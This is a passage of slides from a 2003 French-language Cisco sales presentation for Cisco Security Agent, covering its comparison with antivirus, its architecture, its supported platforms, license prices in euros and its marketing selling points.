  • 27. 27 27 27 © 2003 Cisco Systems, Inc. All rights reserved. Différenciation de CSA CSA Anti-Virus Protection contre tout codes malicieux X Protection anti Virus / Vers connus Protection anti Virus / Vers non connnus Scanning et détection de fichier corrompus Nettoyage des fichiers infectés Identification des Virus / Vers Pas d’update de signatures Fonctionnalité Firewall distribué Vérouillage de l’Operating System Corrélation d’évènements X X X X X X X X X
  • 28. 28 © 2003 Cisco Systems, Inc. All rights reserved. Composition de l’offre
  • 29. 29 29 29 © 2003 Cisco Systems, Inc. All rights reserved. Architecture Cisco Security Agent SNMP Traps Custom Programs Local File • Gestion centralisée des règles et des alertes – CSA MC • Agents Desktops • Agents Serveurs Browser-based Management GUI Configuration Reports, Events VMS E-Mail Pagger Agents Serveurs CSA Management Center Agents Desktop Policy updates
  • 30. 30 30 30 © 2003 Cisco Systems, Inc. All rights reserved. CSA Starter Bundle • CiscoWorks VPN/Security Management Solution (VMS) Basic 2.2 • CiscoWorks Management Center for Cisco Security Agents 4.01 (CMC) • 1 agent CSA Serveur • 10 agents CSA Desktop • Les ajouts de licences en supplément
  • 31. 31 31 31 © 2003 Cisco Systems, Inc. All rights reserved. Agents Serveurs • Agent Windows Windows 2000 Server and Advanced Server Windows NT 4.0 Server and Enterprise Server (Service Pack 5 or later) • Agent Solaris Solaris 8 Service Pack ARC architecture (64-bit kernel)
  • 32. 32 32 32 © 2003 Cisco Systems, Inc. All rights reserved. Agent Desktop • Windows uniquement Windows NT 4 Workstation (Service Pack 5 or later) Windows 2000 Professional Windows XP Professional
  • 33. 33 33 33 © 2003 Cisco Systems, Inc. All rights reserved. CSA Management Center Références Désignation Prix € CSA-STARTER-K9= CSA Starter Bundle 2 700 € CWVMS-2.2-UR-K9 VMS 2.2 WIN/SOL Unrestricted 17 996 € CWVMS-2.2-UR-MR-K9 Minor Release update for VMS 2.X Unrestricted 896 €
  • 34. 34 34 34 © 2003 Cisco Systems, Inc. All rights reserved. Prix des licences Serveurs Références Désignation Prix € CSA-SRVR-K9= Agent CSA Serveur (Win + Sol), 1 Agent 1 755 € CSA-B10-SRVR-K9 Agent CSA Serveur (Win + Sol), 10 Agent Bundle 17 199 € CSA-B25-SRVR-K9 Agent CSA Serveur (Win + Sol), 25 Agent Bundle 40 365 € CSA-B50-SRVR-K9 Agent CSA Serveur (Win + Sol), 50 Agent Bundle 75 465 € CSA-B100-SRVR-K9 Agent CSA Serveur (Win + Sol), 100 Agent Bundle 143 910 € CSA-B250-SRVR-K9 Agent CSA Serveur (Win + Sol), 250 Agent Bundle 351 000 € CSA-B500-SRVR-K9 Agent CSA Serveur (Win + Sol), 500 Agent Bundle 684 450 € CSA-B1000-SRVR-K9 Agent CSA Serveur (Win + Sol), 1000 Agent Bundle 1 228 500 €
  • 35. 35 35 35 © 2003 Cisco Systems, Inc. All rights reserved. Prix des licences Desktop Références Désignation Prix € CSA-B25-DTOP-K9 CSA Agent Desktop (Win + Sol), 25 Agent Bundle 1 913 € CSA-B100-DTOP-K9 CSA Agent Desktop (Win + Sol), 100 Agent Bundle 7 421 € CSA-B250-DTOP-K9 CSA Agent Desktop (Win + Sol), 250 Agent Bundle 17 213 € CSA-B500-DTOP-K9 CSA Agent Desktop (Win + Sol), 500 Agent Bundle 31 748 € CSA-B1000-DTOP-K9 CSA Agent Desktop (Win + Sol), 1000 Agent Bundle 57 375 € CSA-B2500-DTOP-K9 CSA Agent Desktop, 2500 Agent Bundle 133 875 € CSA-B5000-DTOP-K9 CSA Agent Desktop, 5000 Agent Bundle 240 975 € CSA-B10000-DTOP-K9 CSA Agent Desktop, 10,000 Agent Bundle 420 750 €
  • 36. 36 © 2003 Cisco Systems, Inc. All rights reserved. En résumé
  • 37. 37 37 37 © 2003 Cisco Systems, Inc. All rights reserved. Productivité - Efficacité • Défense préventive et non pas corrective • Aucun effort d’analyse de log IDS. Aucun travail de filtrage de log nécessaire • Aucune mise à jour de signature nécessaire • Facile et rapide à déployer (30 min) • Industrialisable (10000 agents / serveur CSA MC) • Gestion centralisée des règles de sécurité • Gestion centralisée des alertes • Corrélation d’alertes
  • 38. 38 38 38 © 2003 Cisco Systems, Inc. All rights reserved. Politiques de sécurité paramétrables • Exploitable sans aucun paramétrage Fournit en standard avec un ensemble complet de règles de sécurité couvrant 90 % des besoins de protection système Agents pré-configurés selon certains usages types (IPTel par exemple) • Complètement paramétrable si besoin est Verrouiller l’usage des applications Définir et distribuer de nouvelles règles de sécurité Rapidement adaptable à de nouveaux besoins applicatifs, sans aucune mise à jour système (juste des règles)
  • 39. 39 39 39 © 2003 Cisco Systems, Inc. All rights reserved. 39 39 39